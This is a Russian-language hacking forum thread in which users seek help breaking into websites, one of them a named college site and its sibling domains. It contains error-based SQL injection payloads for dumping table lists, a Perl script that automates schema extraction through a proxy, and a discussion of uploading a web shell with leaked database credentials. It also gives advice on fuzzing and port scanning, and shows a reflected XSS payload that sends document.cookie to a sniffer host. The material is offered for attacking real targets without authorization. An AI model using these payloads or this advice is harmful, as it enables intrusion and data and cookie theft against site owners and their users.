Привет всем. Что можно сделать с этим? Code: warning: file_get_contents(http://site.ru/client/instructions.php?pid=dsadas%00) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 500 Internal Server Error in /home/betteam/public_html/includes/common.inc(1695) : eval()'d code on line 7.
очень заинтересован базой одной сайты (инфа плтная). адрес допустим такой: http://site.aa.su/ если переходить по разделам, то адрес меняеться так: http://site.aa.su/раздел/ т.е. никаких файлов нету, чтоб мне понять что к чему. сайт самописный. Как узнать что за БД ?? и возможноси проникновения ?
Пробуй фаззинг, либо сам подбирай верный запрос, опираясь на логику скрипта. Если совсем глухо и не получается сломать из веба, сканируй открытые порты, смотри, что на них висит, коннекться к ним телнетом, чтобы узнать версии демонов и ищи под них эксплойты. То, что ты описал, называется Mod_Rewrite.
есть запрос Code: +and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+[COLOR=Red]206[/COLOR],1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+ как видим, в базе более двухсот таблиц. пребирать лимит руками не кошерно. есть ли возможность вывести весь список таблиц в блайнд-скуле?
Не знаю чем и как делать ( никак не получаеться. я думаю специально сделали на домене 3_го уровня, чтоб невозможно было даже IP адрес ловить. встроенные утилиты wind ничего не могут определить(ping, nslookup, tracert), т.е. IP адрес. А вот XSpider тоже молчит ****:
ок. попробую. а что на счёт бенчмарка с переменными? типа Code: concat(@i:=0x00,@o:=0x0d0a,benchmark(123,@o:=CONCAT(@o,0x0d0a,(SELECT+concat+(table_schema,0x2E,@i:=table_name)+FROM+information_schema.tables+WHERE+table_name>@i+order+by table_name+LIMIT+1))),@o) никак нельзя в блайнд так засунуть, чтоб он всё в ошибке выводил?
Все равно вывести все таблицы за один запрос в ошибке не получиться, так как, метод floor rand - имеет ограничение в 64 символа, а метод основанный на выборке записи по средствам XPath - 31 символ.
Привет, как узнать полный путь у www папке на сайте http://www.mgccc.edu/ ? При наличии LOAD_FILE, есть ли какие-то брутфорсные варианты подбора папки? Например, софт, который пробует стандартные структуры папок?
Возможно ли залить шелл, если есть инъекция, кавычки НЕ экранируются, известен путь к сайту, но на сайте нету папок, в которые муксул может писать? В конфиге обнаружен логин-пароль юзера дб (удаленно не подключается), вроде как админки нету на сайте. Сайт тот же, что и в предыдущем посте: http://www.mgccc.edu/ На том же серваке лежат http://www.mississippibowl.com, http://www.mississippibowl.org, http://www.msbowl.com, http://www.mgcccbulldogs.com, http://www.saccr.org, и их файлы принадлежат одному юзеру. Если кто-то найдет и ткнет в форму уплоада носом, будет просто отлично
Code: #!/usr/bin/perl -w # target use LWP::UserAgent; $ua = LWP::UserAgent->new; my $proxy="http://xx.xxx.xxx.xxx:port"; # proxy $ua->proxy(['http','https'],$proxy); my $i=0; while(1) { my $req = HTTP::Request->new(GET => "http://[host][path]/?variable=(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+SCHEMA_NAME+FROM+information_schema.SCHEMATA+limit+$i,1),floor(rand(0)*2)))--+"); my $res = $ua->request($req); if ($res->as_string =~ /Duplicate entry(.+)for/) { open(FILE,'>>results.txt'); print "print $i: $1\n"; print FILE "$1\n"; close(FILE); $i++; } else {last;} } ну под себя не сложно подмутить.
все таки хотел узнать такие домены как: http://site.com.su/ трудно расковырять? и это выбирается в целях безопасности? скачал JBroFuzz для фаззинга, но не знаю по каким параметрам сканировать. запутил с SQL инекциями, но ясный пень, что ничего не нашлось ))))))
Reflected XSS и magic_quotes_gpc Есть пассивная XSS вида Code: ?file=<img src="http://sniffer/evliimage.gif?"+document.cookie> Судя по всему, magic_quotes_gpc включена, поэтому двойные и одинарные кавычки экранируются. Как можно обойти это, при этом не используя конструкции вида Code: <script src=http://sniffer/evilcode.hs></script>